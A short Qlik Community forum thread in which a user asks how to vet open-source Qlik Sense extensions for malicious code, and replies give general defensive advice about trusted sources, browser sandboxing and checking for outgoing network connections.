Qlik Community

Qlik Sense Integration, Extensions, & APIs

Discussion board where members can learn more about Integration, Extensions and API’s for Qlik Sense.

Announcements
Qlik® Product Spotlight: Discover what’s possible. Get more from our products.
See for yourself. Register today.
swarup_malli
Valued Contributor

Can extensions carry security risk?

Hi,

I found a couple of open source extension.But before installing them on the Qliksense server ,I want to make sure it does not contain any trojan program that could pose a security risk.

Any tips on how to look for malicious code in extensions?

3 Replies
satishkurra
Valued Contributor II

Re: Can extensions carry security risk?

Make sure you are downloading from a trusted sites and the websites from Qlik Partners

Also you can refer Stephan Walther's website

qlikblog.at | QlikView / Qlik Sense Blog by Stefan Walther

Employee
Employee

Re: Can extensions carry security risk?

So as a rule of thumb extensions poses as much security risk as browsing to Facebook.com, Google.com or any random web page on the web.

Extensions are client side technology, meaning it will execute within the sandbox that is the users browser, so it can't access anything on the server or outside the normal resources a browser can access on the local machine.

The potential risk you are running is that a extension could intercept the data from a app and then pipe that to a third party server somewhere. So I would scan for any outgoing connections such as xmlhttprequest, websockets etc

The Qlik cookies available to steal won't reveal anything special to the attacker apart from a session id which you can lock down with extended security in your virtual proxy.

swarup_malli
Valued Contributor

Re: Can extensions carry security risk?

Thank you guys! sorry for the late reply

Community Browser